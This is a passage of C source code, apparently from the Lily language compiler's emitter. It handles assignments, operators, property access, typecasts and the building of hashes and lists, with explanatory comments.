*/ call_name = "(anonymous)"; } lily_msgbuf_add_fmt(msgbuf, "%s %s%s%s", kind, class_name, separator, call_name); } /* assign_post_check This function is called after any assignment is evaluated. This allows assignment chains (because those are nice), but disables assignments from being nested within other expressions. Without this function, things like 'integer a = (b = 10)' are possible. The tree passed is the assignment tree itself. */ static void assign_post_check(lily_emit_state *emit, lily_ast *ast) { if (ast->parent && (ast->parent->tree_type != tree_binary || ast->parent->op < expr_assign)) { lily_raise(emit->raiser, lily_SyntaxError, "Cannot nest an assignment within an expression.\n"); } else if (ast->parent == NULL) /* This prevents conditions from using the result of an assignment. */ ast->result = NULL; } /*****************************************************************************/ /* Error raising functions */ /*****************************************************************************/ static void bad_assign_error(lily_emit_state *emit, int line_num, lily_type *left_type, lily_type *right_type) { /* Remember that right is being assigned to left, so right should get printed first. */ lily_raise_adjusted(emit->raiser, line_num, lily_SyntaxError, "Cannot assign type '^T' to type '^T'.\n", right_type, left_type); } static void bad_arg_error(lily_emit_state *emit, lily_emit_call_state *cs, lily_type *got, lily_type *expected) { push_info_to_error(emit, cs); lily_msgbuf *msgbuf = emit->raiser->msgbuf; emit->raiser->line_adjust = cs->ast->line_num; /* If this call has unresolved generics, resolve those generics as themselves so the error message prints out correctly. */ lily_ts_resolve_as_self(emit->ts); /* These names are intentionally the same length and on separate lines so that slight naming issues become more apparent. */ lily_msgbuf_add_fmt(msgbuf, ", argument #%d is invalid:\n" "Expected Type: ^T\n" "Received Type: ^T\n", cs->arg_count + 1, lily_ts_resolve(emit->ts, expected), got); lily_raise_prebuilt(emit->raiser, lily_SyntaxError); } /* determine_left_type This function is called on the left side of an assignment to determine what the result of that assignment will be. However, this function does NOT do any evaluation. This function exists because assignments run from right to left, but at the same time the right side should infer the resulting type based off of the left side. 
*/ static lily_type *determine_left_type(lily_emit_state *emit, lily_ast *ast) { lily_type *result_type = NULL; if (ast->tree_type == tree_global_var || ast->tree_type == tree_local_var) result_type = ast->sym->type; else if (ast->tree_type == tree_subscript) { lily_ast *var_tree = ast->arg_start; lily_ast *index_tree = var_tree->next_arg; result_type = determine_left_type(emit, var_tree); if (result_type != NULL) { if (result_type->cls->id == SYM_CLASS_HASH) result_type = result_type->subtypes[1]; else if (result_type->cls->id == SYM_CLASS_TUPLE) { if (index_tree->tree_type != tree_literal || index_tree->sym->type->cls->id != SYM_CLASS_INTEGER) result_type = NULL; else { int literal_index = index_tree->literal->value.integer; if (literal_index < 0 || literal_index > result_type->subtype_count) result_type = NULL; else result_type = result_type->subtypes[literal_index]; } } else if (result_type->cls->id == SYM_CLASS_LIST) result_type = result_type->subtypes[0]; } } else if (ast->tree_type == tree_oo_access) { result_type = determine_left_type(emit, ast->arg_start); if (result_type != NULL) { char *oo_name = lily_membuf_get(emit->ast_membuf, ast->membuf_pos); lily_class *lookup_class = result_type->cls; lily_type *lookup_type = result_type; lily_prop_entry *prop = lily_find_property(emit->symtab, lookup_class, oo_name); if (prop) { result_type = prop->type; if (result_type->flags & TYPE_IS_UNRESOLVED) { result_type = lily_ts_resolve_by_second(emit->ts, lookup_type, result_type); } } else result_type = NULL; } } /* All other are either invalid for the left side of an assignment. */ else result_type = NULL; return result_type; } /*****************************************************************************/ /* Tree evaluation functions (and tree-related helpers). */ /*****************************************************************************/ /* emit_binary_op This is called to handle simple binary ops (except for assign). Compound ops will route through here via emit_op_for_compound, and depend on this function NOT doing any evaluation. */ static void emit_binary_op(lily_emit_state *emit, lily_ast *ast) { int opcode; lily_class *lhs_class, *rhs_class, *storage_class; lily_storage *s; lhs_class = ast->left->result->type->cls; rhs_class = ast->right->result->type->cls; if (lhs_class->id <= SYM_CLASS_STRING && rhs_class->id <= SYM_CLASS_STRING) opcode = generic_binop_table[ast->op][lhs_class->id][rhs_class->id]; else { /* Calling type_matchup here to do the test allows 'any' to compare to base values, as well as enum classes to compare to instances of their inner subtypes. Call it twice for each side so that this works: any a = 10 a == 10 10 == a */ if (ast->left->result->type == ast->right->result->type || type_matchup(emit, ast->left->result->type, ast->right) || type_matchup(emit, ast->right->result->type, ast->left)) { if (ast->op == expr_eq_eq) opcode = o_is_equal; else if (ast->op == expr_not_eq) opcode = o_not_eq; else opcode = -1; } else opcode = -1; } if (opcode == -1) lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Invalid operation: ^T %s ^T.\n", ast->left->result->type, opname(ast->op), ast->right->result->type); if (ast->op == expr_plus || ast->op == expr_minus || ast->op == expr_multiply || ast->op == expr_divide) if (lhs_class->id >= rhs_class->id) storage_class = lhs_class; else storage_class = rhs_class; else /* assign is handled elsewhere, so these are just comparison ops. These always return 0 or 1, regardless of the classes put in. 
There's no bool class (yet), so an integer class is used instead. */ storage_class = emit->symtab->integer_class; s = get_storage(emit, storage_class->type); s->flags |= SYM_NOT_ASSIGNABLE; write_5(emit, opcode, ast->line_num, ast->left->result->reg_spot, ast->right->result->reg_spot, s->reg_spot); ast->result = (lily_sym *)s; } /* emit_op_for_compound Examples: +=, -=, *=, /=, etc. X Y= Z can be folded into X = X Y Z This allows the vm to not have compound expression opcodes. This assumes that the left and the right have already been walked. */ static void emit_op_for_compound(lily_emit_state *emit, lily_ast *ast) { int save_op = ast->op; int spoof_op; if (ast->op == expr_div_assign) spoof_op = expr_divide; else if (ast->op == expr_mul_assign) spoof_op = expr_multiply; else if (ast->op == expr_modulo_assign) spoof_op = expr_modulo; else if (ast->op == expr_plus_assign) spoof_op = expr_plus; else if (ast->op == expr_minus_assign) spoof_op = expr_minus; else if (ast->op == expr_left_shift_assign) spoof_op = expr_left_shift; else if (ast->op == expr_right_shift_assign) spoof_op = expr_right_shift; else { lily_raise(emit->raiser, lily_SyntaxError, "Invalid compound op: %s.\n", opname(ast->op)); spoof_op = -1; } ast->op = spoof_op; emit_binary_op(emit, ast); ast->op = save_op; } /* assign_optimize_check ALL opcodes that return a result always have the result as the last value written. This is no accident: There are many cases where the emitter makes a storage that isn't needed. This function determines if an assignment can be optimized out by rewriting the last emitted opcode to return to what would have been assigned to. */ static int assign_optimize_check(lily_ast *ast) { int can_optimize = 1; do { /* assigning to a global is done differently than with a local, so it can't be optimized. */ if (ast->left->tree_type == tree_global_var) { can_optimize = 0; break; } lily_ast *right_tree = ast->right; /* Parenths don't write anything, so dive to the bottom of them. */ while (right_tree->tree_type == tree_parenth) right_tree = right_tree->arg_start; /* Gotta do basic assignments. */ if (right_tree->tree_type == tree_local_var) { can_optimize = 0; break; } /* If the parent is binary, then it is an assignment or compound op. Those eval from right-to-left, so leave them alone. */ if (ast->parent != NULL && ast->parent->tree_type == tree_binary) { can_optimize = 0; break; } /* Also check if the right side is an assignment or compound op. */ if (right_tree->tree_type == tree_binary && right_tree->op >= expr_assign) { can_optimize = 0; break; } /* If the left is an any and the right is not, then don't reduce. Any assignment is written so that it puts the right side into a container. */ if (ast->left->result->type->cls->id == SYM_CLASS_ANY && right_tree->result->type->cls->id != SYM_CLASS_ANY) { can_optimize = 0; break; } } while (0); return can_optimize; } /* calculate_var_type This is called when the left side of an assignment doesn't have a type because it was declared using 'var ...'. This will return the proper type for the left side of the expression. */ static lily_type *calculate_var_type(lily_emit_state *emit, lily_type *input_type) { lily_type *result; if (input_type->cls->flags & CLS_VARIANT_CLASS) result = lily_ts_build_enum_by_variant(emit->ts, input_type); else result = input_type; return result; } /* eval_assign This handles assignments where the left is not a subscript or dot access. 
*/ static void eval_assign(lily_emit_state *emit, lily_ast *ast) { int left_cls_id, opcode; lily_sym *left_sym, *right_sym; opcode = -1; if (ast->left->tree_type != tree_global_var && ast->left->tree_type != tree_local_var) { /* If the left is complex and valid, it would have been sent off to a different assign. Ergo, it must be invalid. */ lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Left side of %s is not assignable.\n", opname(ast->op)); } if (ast->right->tree_type != tree_local_var) eval_tree(emit, ast->right, ast->left->result->type, 1); /* For 'var <name> = ...', fix the type. */ if (ast->left->result->type == NULL) ast->left->result->type = calculate_var_type(emit, ast->right->result->type); ast->left->result->flags &= ~SYM_NOT_INITIALIZED; left_sym = ast->left->result; right_sym = ast->right->result; left_cls_id = left_sym->type->cls->id; if (left_sym->type != right_sym->type) { if (left_sym->type->cls->id == SYM_CLASS_ANY) { /* Bare variants are not allowed, and type_matchup is a bad idea here. Rebox the variant into an enum, then let assign do the rest of the magic. The reason that type_matchup is a bad idea is that it will box the variant into an enum, then an any, which will be the target of the assign. This results in a junk storage. */ if (right_sym->type->cls->flags & CLS_VARIANT_CLASS) { rebox_variant_to_enum(emit, ast->right); right_sym = ast->right->result; } opcode = o_assign; } else if (type_matchup(emit, ast->left->result->type, ast->right)) { /* type_matchup may update the result, so update the cache. */ right_sym = ast->right->result; } else bad_assign_error(emit, ast->line_num, left_sym->type, right_sym->type); } if (opcode == -1) { if (left_cls_id == SYM_CLASS_INTEGER || left_cls_id == SYM_CLASS_DOUBLE) opcode = o_fast_assign; else opcode = o_assign; } if (ast->op > expr_assign) { if (ast->left->tree_type == tree_global_var) eval_tree(emit, ast->left, NULL, 1); emit_op_for_compound(emit, ast); right_sym = ast->result; } if (ast->left->tree_type == tree_global_var) opcode = o_set_global; /* If assign can be optimized out, then rewrite the last result to point to the left side. */ if (assign_optimize_check(ast)) emit->code[emit->code_pos-1] = left_sym->reg_spot; else { write_4(emit, opcode, ast->line_num, right_sym->reg_spot, left_sym->reg_spot); } ast->result = right_sym; } /* This is an access like 'abc.xyz'. There are two fairly different cases for this: 1: The given class has a method named xyz. This is checked first. Examples: 'string.concat' and 'integer.to_string'. 2: The given class has a property named xyz. In this case, the value is a class which is subscripted for the right property. This stores either the method var or the property within the ast's item. */ static void eval_oo_access_for_item(lily_emit_state *emit, lily_ast *ast) { if (emit->lambda_depth && ast->arg_start->tree_type == tree_self) maybe_close_over_class_self(emit); if (ast->arg_start->tree_type != tree_local_var) eval_tree(emit, ast->arg_start, NULL, 1); lily_class *lookup_class = ast->arg_start->result->type->cls; char *oo_name = lily_membuf_get(emit->ast_membuf, ast->membuf_pos); lily_var *var = lily_find_class_callable(emit->symtab, lookup_class, oo_name); /* Is this an attempt to access a method that hasn't been loaded yet? 
*/ if (var == NULL) var = lily_parser_dynamic_load(emit->parser, lookup_class, oo_name); if (var == NULL) { lily_prop_entry *prop = lily_find_property(emit->symtab, lookup_class, oo_name); if (prop == NULL) { lily_raise(emit->raiser, lily_SyntaxError, "Class %s has no method or property named %s.\n", lookup_class->name, oo_name); } if (ast->arg_start->tree_type == tree_self) lily_raise(emit->raiser, lily_SyntaxError, "Use @<name> to get/set properties, not self.<name>.\n"); ast->item = (lily_item *)prop; } else ast->item = (lily_item *)var; } /* This is called on trees of type tree_oo_access which have their ast->item as a property. This will solve the property with the type that lead up to it. class example[A](value: A) { var contents = value } var v = example::new(10).contents 'contents' has type 'A' relative to whatever type that 'example' contains. Since example has type 'integer', then 'v' is solved to be of type integer. This is a convenience function to avoid creating a storage for the property when that may not be wanted. */ static lily_type *get_solved_property_type(lily_emit_state *emit, lily_ast *ast) { lily_type *property_type = ast->property->type; if (property_type->flags & TYPE_IS_UNRESOLVED) { property_type = lily_ts_resolve_by_second(emit->ts, ast->arg_start->result->type, property_type); } return property_type; } /* This is called after the caller has run eval_oo_access_for_item and has determined that they want the property in a storage. This does that. */ static void oo_property_read(lily_emit_state *emit, lily_ast *ast) { lily_prop_entry *prop = ast->property; lily_type *type = get_solved_property_type(emit, ast); lily_storage *result = get_storage(emit, type); /* This function is only called on trees of type tree_oo_access which have a property into the ast's item. */ write_5(emit, o_get_property, ast->line_num, ast->arg_start->result->reg_spot, prop->id, result->reg_spot); ast->result = (lily_sym *)result; } /* This handles tree_oo_access for eval_tree. The contents are always dumped into a storage, unlike with some users of tree_oo_access. */ static void eval_oo_access(lily_emit_state *emit, lily_ast *ast) { eval_oo_access_for_item(emit, ast); /* An 'x.y' access will either yield a property or a class method. */ if (ast->item->flags & ITEM_TYPE_PROPERTY) oo_property_read(emit, ast); else { lily_storage *result = get_storage(emit, ast->sym->type); write_4(emit, o_get_readonly, ast->line_num, ast->sym->reg_spot, result->reg_spot); ast->result = (lily_sym *)result; } } /* eval_property This handles evaluating '@<x>' within a either a class constructor or a function/method defined within a class. */ static void eval_property(lily_emit_state *emit, lily_ast *ast) { if (emit->lambda_depth && ast->left->tree_type == tree_self); maybe_close_over_class_self(emit); if (ast->property->type == NULL) lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Invalid use of uninitialized property '@%s'.\n", ast->property->name); lily_storage *result = get_storage(emit, ast->property->type); write_5(emit, o_get_property, ast->line_num, emit->block->self->reg_spot, ast->property->id, result->reg_spot); ast->result = (lily_sym *)result; } /* This is called to handle assignments when the left side is of type tree_oo_access (ex: x[0].y = z, a.b.c = d). 
*/ static void eval_oo_assign(lily_emit_state *emit, lily_ast *ast) { lily_type *left_type; eval_oo_access_for_item(emit, ast->left); left_type = ast->left->property->type; if ((ast->left->item->flags & ITEM_TYPE_PROPERTY) == 0) lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Left side of %s is not assignable.\n", opname(ast->op)); if (ast->right->tree_type != tree_local_var) eval_tree(emit, ast->right, left_type, 1); left_type = get_solved_property_type(emit, ast->left); lily_sym *rhs = ast->right->result; lily_type *right_type = rhs->type; if (left_type != right_type && left_type->cls->id != SYM_CLASS_ANY) { emit->raiser->line_adjust = ast->line_num; bad_assign_error(emit, ast->line_num, left_type, right_type); } if (ast->op > expr_assign) { oo_property_read(emit, ast->left); emit_op_for_compound(emit, ast); rhs = ast->result; } write_5(emit, o_set_property, ast->line_num, ast->left->arg_start->result->reg_spot, ast->left->property->id, rhs->reg_spot); ast->result = rhs; } /* This handles assignments like '@x = y'. These are always simple, because if it was something like '@x[y] = z', then subscript assign would get it. The left side is always just a property. */ static void eval_property_assign(lily_emit_state *emit, lily_ast *ast) { if (emit->lambda_depth) maybe_close_over_class_self(emit); lily_type *left_type = ast->left->property->type; lily_sym *rhs; if (ast->right->tree_type != tree_local_var) /* Important! Expecting the lhs will auto-fix the rhs if needed. */ eval_tree(emit, ast->right, left_type, 1); rhs = ast->right->result; lily_type *right_type = ast->right->result->type; /* For 'var @<name> = ...', fix the type of the property. */ if (left_type == NULL) { ast->left->property->type = right_type; ast->left->property->flags &= ~SYM_NOT_INITIALIZED; left_type = right_type; } if (left_type != right_type && left_type->cls->id != SYM_CLASS_ANY) { emit->raiser->line_adjust = ast->line_num; bad_assign_error(emit, ast->line_num, left_type, right_type); } if (ast->op > expr_assign) { eval_tree(emit, ast->left, NULL, 1); emit_op_for_compound(emit, ast); rhs = ast->result; } write_5(emit, o_set_property, ast->line_num, emit->block->self->reg_spot, ast->left->property->id, rhs->reg_spot); ast->result = rhs; } static void eval_upvalue_assign(lily_emit_state *emit, lily_ast *ast) { eval_tree(emit, ast->right, NULL, 1); int spot; lily_sym *left_sym = ast->left->sym; if (ast->left->tree_type == tree_open_upvalue) { close_over_sym(emit, left_sym); spot = emit->closed_pos - 1; } else spot = find_closed_sym_spot(emit, ast->left->sym); lily_sym *rhs = ast->right->result; if (ast->op > expr_assign) { /* Don't call eval_tree again, because if the left is tree_open_upvalue, the left will be closed over again. That will result in the compound op using the wrong upvalue spot, which is bad. */ lily_storage *s = get_storage(emit, ast->left->sym->type); write_4(emit, o_get_upvalue, ast->line_num, spot, s->reg_spot); ast->left->result = (lily_sym *)s; emit_op_for_compound(emit, ast); rhs = ast->result; } write_4(emit, o_set_upvalue, ast->line_num, spot, rhs->reg_spot); ast->result = ast->right->result; } /* eval_logical_op This handles || (or) as well as && (and). */ static void eval_logical_op(lily_emit_state *emit, lily_ast *ast) { lily_storage *result; int is_top, jump_on; jump_on = (ast->op == expr_logical_or); /* The top-most and/or creates an ANDOR block so that all of the jumps that get written can be properly folded. 
*/ if (ast->parent == NULL || (ast->parent->tree_type != tree_binary || ast->parent->op != ast->op)) { is_top = 1; lily_emit_enter_block(emit, BLOCK_ANDOR); } else is_top = 0; if (ast->left->tree_type != tree_local_var) eval_tree(emit, ast->left, NULL, 1); /* If the left is the same as this tree, then it's already checked itself and doesn't need a retest. However, and/or are opposites, so they have to check each other (so the op has to be exactly the same). */ if ((ast->left->tree_type == tree_binary && ast->left->op == ast->op) == 0) emit_jump_if(emit, ast->left, jump_on); if (ast->right->tree_type != tree_local_var) eval_tree(emit, ast->right, NULL, 1); emit_jump_if(emit, ast->right, jump_on); if (is_top == 1) { int save_pos; lily_tie *success_lit, *failure_lit; lily_symtab *symtab = emit->symtab; result = get_storage(emit, symtab->integer_class->type); success_lit = lily_get_integer_literal(symtab, (ast->op == expr_logical_and)); failure_lit = lily_get_integer_literal(symtab, (ast->op == expr_logical_or)); write_4(emit, o_get_readonly, ast->line_num, success_lit->reg_spot, result->reg_spot); write_2(emit, o_jump, 0); save_pos = emit->code_pos - 1; lily_emit_leave_block(emit); write_4(emit, o_get_readonly, ast->line_num, failure_lit->reg_spot, result->reg_spot); emit->code[save_pos] = emit->code_pos - emit->block->jump_offset; ast->result = (lily_sym *)result; } else /* If is_top is false, then this tree has a parent that's binary and has the same op. The parent won't write a jump_if for this tree, because that would be a double-test. Setting this to NULL anyway as a precaution. */ ast->result = NULL; } /* emit_sub_assign This handles an assignment where the left side has a subscript involved (ex: x[0] = 10). This handles compound ops as well as all subscript assigning types (list, hash, and tuple) There are three parts: The var, the index, and the new value (right). Var: ast->left->arg_start Index: ast->left->arg_start->next Right: ast->right */ static void eval_sub_assign(lily_emit_state *emit, lily_ast *ast) { lily_ast *var_ast = ast->left->arg_start; lily_ast *index_ast = var_ast->next_arg; lily_sym *rhs; lily_type *elem_type; /* This gets the type that the left will be without actually evaluating it. It is important to not run the left before the right, because assigns should be right to left. */ lily_type *left_type = determine_left_type(emit, ast->left); if (ast->right->tree_type != tree_local_var) eval_tree(emit, ast->right, left_type, 1); rhs = ast->right->result; if (var_ast->tree_type != tree_local_var) { eval_tree(emit, var_ast, NULL, 1); if (var_ast->result->flags & SYM_NOT_ASSIGNABLE) { lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Left side of %s is not assignable.\n", opname(ast->op)); } } if (index_ast->tree_type != tree_local_var) eval_tree(emit, index_ast, NULL, 1); check_valid_subscript(emit, var_ast, index_ast); elem_type = get_subscript_result(var_ast->result->type, index_ast); if (elem_type != rhs->type && elem_type->cls->id != SYM_CLASS_ANY) { emit->raiser->line_adjust = ast->line_num; bad_assign_error(emit, ast->line_num, elem_type, rhs->type); } if (ast->op > expr_assign) { /* For a compound assignment to work, the left side must be subscripted to get the value held. 
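
           A small example (hypothetical code):

               var lst = [1, 2, 3]
               lst[0] += 10    # o_get_item fetches lst[0], the compound op
                               # runs, then o_set_item stores the result back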
*/ lily_storage *subs_storage = get_storage(emit, elem_type); write_5(emit, o_get_item, ast->line_num, var_ast->result->reg_spot, index_ast->result->reg_spot, subs_storage->reg_spot); ast->left->result = (lily_sym *)subs_storage; /* Run the compound op now that ->left is set properly. */ emit_op_for_compound(emit, ast); rhs = ast->result; } write_5(emit, o_set_item, ast->line_num, var_ast->result->reg_spot, index_ast->result->reg_spot, rhs->reg_spot); ast->result = rhs; } /* eval_typecast This handles writing a typecast. A typecast has two parts: Value: ast->arg_start type: ast->arg_start->next_arg->type */ static void eval_typecast(lily_emit_state *emit, lily_ast *ast) { lily_type *cast_type = ast->arg_start->next_arg->typecast_type; lily_ast *right_tree = ast->arg_start; if (right_tree->tree_type != tree_local_var) eval_tree(emit, right_tree, NULL, 1); lily_type *var_type = right_tree->result->type; if (cast_type == var_type) ast->result = (lily_sym *)right_tree->result; else if (cast_type->cls->id == SYM_CLASS_ANY) { /* This function automatically fixes right_tree's result to the new any value. */ emit_rebox_to_any(emit, right_tree); ast->result = right_tree->result; } else if (var_type->cls->id == SYM_CLASS_ANY) { lily_storage *result = get_storage(emit, cast_type); write_4(emit, o_any_typecast, ast->line_num, right_tree->result->reg_spot, result->reg_spot); ast->result = (lily_sym *)result; } else { lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Cannot cast type '^T' to type '^T'.\n", var_type, cast_type); } } /* eval_unary_op This handles unary ops. Unary ops currently only work on integers. */ static void eval_unary_op(lily_emit_state *emit, lily_ast *ast) { uint16_t opcode; lily_class *lhs_class; lily_storage *storage; lhs_class = ast->left->result->type->cls; lily_class *integer_class = emit->symtab->integer_class; if (lhs_class != integer_class) lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Invalid operation: %s%s.\n", opname(ast->op), lhs_class->name); storage = get_storage(emit, integer_class->type); storage->flags |= SYM_NOT_ASSIGNABLE; if (ast->op == expr_unary_minus) opcode = o_unary_minus; else if (ast->op == expr_unary_not) opcode = o_unary_not; else opcode = -1; write_4(emit, opcode, ast->line_num, ast->left->result->reg_spot, storage->reg_spot); ast->result = (lily_sym *)storage; } /* rebox_enum_variant_values This function is called when building a list or a hash and the values contain at least one variant or enum value. In the event that there is not a common type, the function attempts to find one by looking at the common parts between each value. If all values are of a given enum class or variants of that class, then the function ensures that the variants are put into an enum class value of the common type. If the common type is incomplete (some of the generics of the enum class are not specified), then missing parts are given the class 'any', and the values are put into an enum class value of some type. If there is no common type, then each variant is put into an enum class value based upon information known to only it, and all values are put into an 'any' value (except those that are already 'any'). This is unlikely. 
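
   A sketch of the three outcomes (hypothetical values, using the Option
   enum class shown in the comments below):

       [Some(1), None]       # common type found: list[Option[integer]]
       [None, None]          # incomplete: unsolved generics default to any,
                             # giving list[Option[any]] unless the caller
                             # wants something more specific
       [Some(1), Some("x")]  # no common type: every value ends up in an any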
*/ static void rebox_enum_variant_values(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int is_hash) { lily_ast *tree_iter = ast->arg_start; lily_type *rebox_type = NULL; lily_class *any_class = emit->symtab->any_class; /* If ast is tree_hash (is_hash == 1), then the values are key, value, key value, and so on. This is about the values, not the keys. */ if (is_hash) tree_iter = tree_iter->next_arg; /* Raise the ceiling so that lily_ts_match doesn't damage the current generic information. */ int adjust = lily_ts_raise_ceiling(emit->ts); lily_class *first_cls = tree_iter->result->type->cls; lily_type *matching_type = NULL; int ok = 1; /* The first order of business is to find the type that parser created which has a class of the enum class, and all generics. ex: enum class Option[A] { Some(A), None } For the above, there's a Option[A] made by parser. Get that. If that isn't possible, then everything gets to be smacked to any. */ if (first_cls->flags & CLS_VARIANT_CLASS) first_cls = first_cls->parent; if (first_cls->flags & CLS_ENUM_CLASS && first_cls != any_class) { matching_type = first_cls->variant_type; } else ok = 0; if (matching_type != NULL) { /* lily_ts_check is awesome. It makes sure that stuff matches while also solving stuff. Begin by throwing in what the caller wants (if the caller knows what they want). This is important, because the caller may want Option[integer] but have [None, None, None]. The three None values should upgrade to Option[integer], not Option[any] as they would do otherwise. */ if (expect_type) lily_ts_check(emit->ts, matching_type, expect_type); while (tree_iter != NULL) { lily_type *type = tree_iter->result->type; /* If there's some disagreement, give up and let everything default to any. */ if (lily_ts_check(emit->ts, matching_type, type) == 0) { ok = 0; break; } tree_iter = tree_iter->next_arg; if (is_hash && tree_iter) tree_iter = tree_iter->next_arg; } } /* If there are some generics unresolved (ex: [None, None, None] where there ISN'T a caller value to infer from), then lily_ts_resolve helps out by defaulting the unsolved generics to type any. */ if (ok) rebox_type = lily_ts_resolve(emit->ts, matching_type); else rebox_type = any_class->type; tree_iter = ast->arg_start; if (is_hash) tree_iter = tree_iter->next_arg; /* Bash everything into the appropriate type. emit_rebox_value will have the variant types first boxed into an enum based off of their individual info before shoving them into an any. */ while (tree_iter) { if (tree_iter->result->type != rebox_type) emit_rebox_value(emit, rebox_type, tree_iter); tree_iter = tree_iter->next_arg; if (is_hash && tree_iter) tree_iter = tree_iter->next_arg; } lily_ts_lower_ceiling(emit->ts, adjust); } /* hash_values_to_anys This converts all of the values of the given ast into anys using o_assign. The result of each value is rewritten to be the any, instead of the old value. emit: The emitter holding the function to write code to. hash_ast: An ast of type tree_hash which has already been evaluated. Caveats: * Caller must do this before writing the o_build_hash instruction out. * Caller must evaluate the hash before calling this. */ static void emit_hash_values_to_anys(lily_emit_state *emit, lily_ast *hash_ast) { /* The keys and values are in hash_ast as args. Since they're in pairs and this only modifies the values, this is how many values there are. */ int value_count = hash_ast->args_collected / 2; /* Make a single large prep that will cover everything needed. 
This ensures that any growing will be done all at once, instead of in smaller blocks. */ write_prep(emit, value_count * 4); lily_ast *iter_ast; for (iter_ast = hash_ast->arg_start; iter_ast != NULL; iter_ast = iter_ast->next_arg->next_arg) { emit_rebox_to_any(emit, iter_ast->next_arg); } } /* emit_list_values_to_anys This converts all of the values of the given ast into anys using o_assign. The result of each value is rewritten to be the any, instead of the old value. emit: The emitter holding the function to write code to. list_ast: An ast of type tree_list which has already been evaluated. Caveats: * Caller must do this before writing the o_build_list_tuple instruction. * Caller must evaluate the list before calling this. */ static void emit_list_values_to_anys(lily_emit_state *emit, lily_ast *list_ast) { int value_count = list_ast->args_collected; write_prep(emit, value_count * 4); lily_ast *iter_ast; for (iter_ast = list_ast->arg_start; iter_ast != NULL; iter_ast = iter_ast->next_arg) { emit_rebox_to_any(emit, iter_ast); } } /* eval_build_hash This handles evaluating trees that are of type tree_hash. This tree is created from a static hash (ex: ["a" => 1, "b" => 2, ...]). Parser has chained the keys and values in a tree_hash as arguments. The arguments are key, value, key, value, key, value. Thus, ->args_collected is the number of items, not the number of pairs collected. Caveats: * Keys can't default to "any", because "any" is not immutable. emit: The emit state containing a function to write the resulting code to. ast: An ast of type tree_hash. */ static void eval_build_hash(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { lily_ast *tree_iter; lily_type *last_key_type = NULL, *last_value_type = NULL, *expect_key_type = NULL, *expect_value_type = NULL; int make_anys = 0, found_variant_or_enum = 0; if (expect_type) { int ok = setup_types_for_build(emit, expect_type, SYM_CLASS_HASH, did_resolve); if (ok) { expect_key_type = lily_ts_get_ceiling_type(emit->ts, 0); expect_value_type = lily_ts_get_ceiling_type(emit->ts, 1); } } for (tree_iter = ast->arg_start; tree_iter != NULL; tree_iter = tree_iter->next_arg->next_arg) { lily_ast *key_tree, *value_tree; key_tree = tree_iter; value_tree = tree_iter->next_arg; if (key_tree->tree_type != tree_local_var) eval_tree(emit, key_tree, expect_key_type, 1); /* Keys -must- all be the same type. They cannot be converted to any later on because any are not valid keys (not immutable). */ if (key_tree->result->type != last_key_type) { if (last_key_type == NULL) { if ((key_tree->result->type->cls->flags & CLS_VALID_HASH_KEY) == 0) { lily_raise_adjusted(emit->raiser, key_tree->line_num, lily_SyntaxError, "Resulting type '^T' is not a valid hash key.\n", key_tree->result->type); } last_key_type = key_tree->result->type; } else { lily_raise_adjusted(emit->raiser, key_tree->line_num, lily_SyntaxError, "Expected a key of type '^T', but key is of type '^T'.\n", last_key_type, key_tree->result->type); } } if (value_tree->tree_type != tree_local_var) eval_tree(emit, value_tree, expect_value_type, 1); /* Only mark user-defined enum classes/variants, because those are the ones that can default. */ if (value_tree->result->type->cls->flags & (CLS_VARIANT_CLASS | CLS_ENUM_CLASS) && value_tree->result->type->cls->id != SYM_CLASS_ANY) found_variant_or_enum = 1; /* Values being promoted to any is okay though. 
:) */ if (value_tree->result->type != last_value_type) { if (last_value_type == NULL) last_value_type = value_tree->result->type; else make_anys = 1; } } if (ast->args_collected == 0) { last_key_type = expect_key_type; last_value_type = expect_value_type; } else { if (found_variant_or_enum) rebox_enum_variant_values(emit, ast, expect_value_type, 1); else if (make_anys || (expect_value_type && expect_value_type->cls->id == SYM_CLASS_ANY)) emit_hash_values_to_anys(emit, ast); last_value_type = ast->arg_start->next_arg->result->type; } lily_class *hash_cls = emit->symtab->hash_class; lily_ts_set_ceiling_type(emit->ts, last_key_type, 0); lily_ts_set_ceiling_type(emit->ts, last_value_type, 1); lily_type *new_type = lily_ts_build_by_ceiling(emit->ts, hash_cls, 2, 0); lily_storage *s = get_storage(emit, new_type); write_build_op(emit, o_build_hash, ast->arg_start, ast->line_num, ast->args_collected, s->reg_spot); ast->result = (lily_sym *)s; } /* check_proper_variant Make sure that the variant has the proper inner type to satisfy the type wanted by the enum. */ static int check_proper_variant(lily_emit_state *emit, lily_type *enum_type, lily_type *given_type, lily_class *variant_cls) { lily_type *variant_type = variant_cls->variant_type; int i, result = 1; if (variant_type->subtype_count != 0) { lily_type *variant_result = variant_type->subtypes[0]; for (i = 0;i < variant_result->subtype_count;i++) { /* The variant may not have all the generics that the parent does. Consider the variant to be proper if the generics that it has match up to the enum type. Ex: For SomeVariant[B] and SomeEnum[A, B], consider it right if the B's match. */ int pos = variant_result->subtypes[i]->generic_pos; if (given_type->subtypes[i] != enum_type->subtypes[pos]) { result = 0; break; } } } /* else the variant takes no generics, and nothing can be wrong. */ return result; } /* enum_membership_check Given a type which is for some enum class, determine if 'right' is a member of the enum class. Returns 1 if yes, 0 if no. */ static int enum_membership_check(lily_emit_state *emit, lily_type *enum_type, lily_type *right) { lily_class *variant_class = right->cls; lily_class *enum_class = enum_type->cls; int ok = 1; /* A variant's parent is always the enum class that it belongs to. */ if (variant_class->parent == enum_class) { /* If the variant does not take arguments, then there's nothing that could have been called wrong. Therefore, the use of the variant MUST be correct. */ if (right->subtype_count != 0) ok = check_proper_variant(emit, enum_type, right, variant_class); } else ok = 0; return ok; } /* type_matchup This is called when 'right' doesn't have quite the right type. If the wanted type is 'any', the value of 'right' is made into an any. On success: right is fixed, 1 is returned. On failure: right isn't fixed, 0 is returned. */ static int type_matchup(lily_emit_state *emit, lily_type *want_type, lily_ast *right) { int ret = 1; if (want_type->cls->id == SYM_CLASS_ANY) emit_rebox_to_any(emit, right); else if (want_type->cls->flags & CLS_ENUM_CLASS) { ret = enum_membership_check(emit, want_type, 